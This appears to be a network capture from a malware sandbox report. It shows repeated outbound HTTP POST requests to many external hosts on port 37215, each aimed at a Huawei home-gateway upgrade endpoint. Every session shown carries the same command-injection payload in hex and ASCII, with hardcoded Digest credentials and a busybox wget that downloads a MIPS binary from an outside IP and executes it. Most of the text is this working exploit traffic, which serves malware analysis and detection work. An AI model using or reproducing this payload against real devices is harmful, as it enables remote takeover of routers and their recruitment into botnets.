                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            819192.168.2.1353740156.100.123.737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.810750961 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            820192.168.2.1349442156.234.212.7237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.811819077 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            821192.168.2.1350454156.192.98.23237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.813306093 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            822192.168.2.1335140197.255.67.23737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.814855099 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            823192.168.2.135633041.242.68.17537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.816370010 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            824192.168.2.1360560197.136.229.637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.817518950 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            825192.168.2.1360054197.80.0.14037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.818643093 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            826192.168.2.1346090156.21.102.7237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.819947004 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            827192.168.2.133289041.59.132.12337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.821238041 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            828192.168.2.1344278197.207.208.12637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.822382927 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 